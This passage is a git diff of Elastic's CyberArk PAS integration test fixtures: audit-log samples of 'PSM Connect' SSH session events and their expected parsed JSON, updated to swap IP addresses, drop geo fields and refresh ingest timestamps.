07:11:09","IsoTimestamp":"2021-03-15T14:11:09Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.13;User=testark;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615814025"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} +<5>1 2021-03-16T10:04:51Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 16 03:04:51\n 2021-03-16T10:04:51Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.15\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b222ac9-c2ad-49ea-9c4e-6829940f58d4;SrcHost=67.43.156.13;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 16 03:04:51","IsoTimestamp":"2021-03-16T10:04:51Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b222ac9-c2ad-49ea-9c4e-6829940f58d4;SrcHost=67.43.156.13;User=testark;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"4"},{"Name":"LastFailDate","Value":"1615888216"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-300-psm-connect.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-300-psm-connect.log-expected.json index 3a58aa20d0d..8ae5563f787 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-300-psm-connect.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-300-psm-connect.log-expected.json @@ -82,7 +82,7 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:30.936250700Z", + "ingested": "2021-12-09T13:36:47.331129200Z", "original": "{\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eno\u003c/Rfc5424\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.6.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eLinux\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-LINUX-SSH-radiussrv.cyberark.local-admin2\u003c/File\u003e\\n \u003cStation\u003e10.2.0.7\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=radiussrv.cyberark.local;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=35fac41e-22b5-11eb-83ca-000c297aae88;SrcHost=10.2.0.6;User=admin2;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"LINUX-SSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"admin2\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"radiussrv.cyberark.local\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMDisabled\\\" Value=\\\"No Reason\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Customer\\\" Value=\\\"Tesla\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"no\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.6.0000\",\"MessageID\":\"300\",\"IsoTimestamp\":\"2021-03-16T15:01:00Z\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Linux\",\"File\":\"Root\\\\Operating System-LINUX-SSH-radiussrv.cyberark.local-admin2\",\"Station\":\"10.2.0.7\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=radiussrv.cyberark.local;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=35fac41e-22b5-11eb-83ca-000c297aae88;SrcHost=10.2.0.6;User=admin2;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"LINUX-SSH\"},{\"Name\":\"UserName\",\"Value\":\"admin2\"},{\"Name\":\"Address\",\"Value\":\"radiussrv.cyberark.local\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"CPMDisabled\",\"Value\":\"No Reason\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"Customer\",\"Value\":\"Tesla\"}]}}}}", "code": "300", "kind": "event", @@ -106,20 +106,11 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "adrian" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { "user": { @@ -143,7 +134,7 @@ }, "@timestamp": "2021-03-11T17:38:20.000Z", "file": { - "path": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian" + "path": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian" }, "ecs": { "version": "1.12.0" @@ -155,15 +146,15 @@ ], "ip": [ "127.0.0.1", - "34.123.103.115", - "81.32.170.205" + "67.43.156.15", + "67.43.156.13" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-11T17:38:20Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:38:20\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:38:20Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e300\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=87012dcc-8290-11eb-949e-080027efd402;SrcHost=127.0.0.1;User=adrian;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:38:20\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:38:20Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e300\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=87012dcc-8290-11eb-949e-080027efd402;SrcHost=127.0.0.1;User=adrian;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "PSM Connect", "issuer": "Administrator", "extra_details": { @@ -176,20 +167,20 @@ "psmid": "PSMServer", "session_id": "87012dcc-8290-11eb-949e-080027efd402", "src_host": "127.0.0.1", - "dst_host": "34.123.103.115" + "dst_host": "67.43.156.15" }, "rfc5424": true, "ca_properties": { "other": {}, "device_type": "Operating System", - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "policy_id": "UnixSSHKeys", "user_name": "adrian" }, - "file": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian", + "file": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian", "safe": "PSM", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "PSM Connect", "timestamp": "Mar 11 09:38:20", "desc": "PSM Connect" @@ -200,8 +191,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:30.936265600Z", - "original": "\u003c5\u003e1 2021-03-11T17:38:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:38:20\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:38:20Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=87012dcc-8290-11eb-949e-080027efd402;SrcHost=127.0.0.1;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:38:20\",\"IsoTimestamp\":\"2021-03-11T17:38:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=87012dcc-8290-11eb-949e-080027efd402;SrcHost=127.0.0.1;User=adrian;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:36:47.331138600Z", + "original": "\u003c5\u003e1 2021-03-11T17:38:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:38:20\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:38:20Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=87012dcc-8290-11eb-949e-080027efd402;SrcHost=127.0.0.1;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:38:20\",\"IsoTimestamp\":\"2021-03-11T17:38:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=87012dcc-8290-11eb-949e-080027efd402;SrcHost=127.0.0.1;User=adrian;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "300", "kind": "event", "action": "psm connect", @@ -224,20 +215,11 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "adrian" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { "user": { @@ -261,7 +243,7 @@ }, "@timestamp": "2021-03-11T17:46:56.000Z", "file": { - "path": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian" + "path": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian" }, "ecs": { "version": "1.12.0" @@ -273,15 +255,15 @@ ], "ip": [ "127.0.0.1", - "34.123.103.115", - "81.32.170.205" + "67.43.156.15", + "67.43.156.13" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-11T17:46:56Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:46:56\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:46:56Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e300\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=ba22b012-8291-11eb-b981-080027efd402;SrcHost=127.0.0.1;User=adrian;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:46:56\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:46:56Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e300\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=ba22b012-8291-11eb-b981-080027efd402;SrcHost=127.0.0.1;User=adrian;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "PSM Connect", "issuer": "Administrator", "extra_details": { @@ -294,20 +276,20 @@ "psmid": "PSMServer", "session_id": "ba22b012-8291-11eb-b981-080027efd402", "src_host": "127.0.0.1", - "dst_host": "34.123.103.115" + "dst_host": "67.43.156.15" }, "rfc5424": true, "ca_properties": { "other": {}, "device_type": "Operating System", - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "policy_id": "UnixSSHKeys", "user_name": "adrian" }, - "file": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian", + "file": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian", "safe": "PSM", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "PSM Connect", "timestamp": "Mar 11 09:46:56", "desc": "PSM Connect" @@ -318,8 +300,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:30.936269200Z", 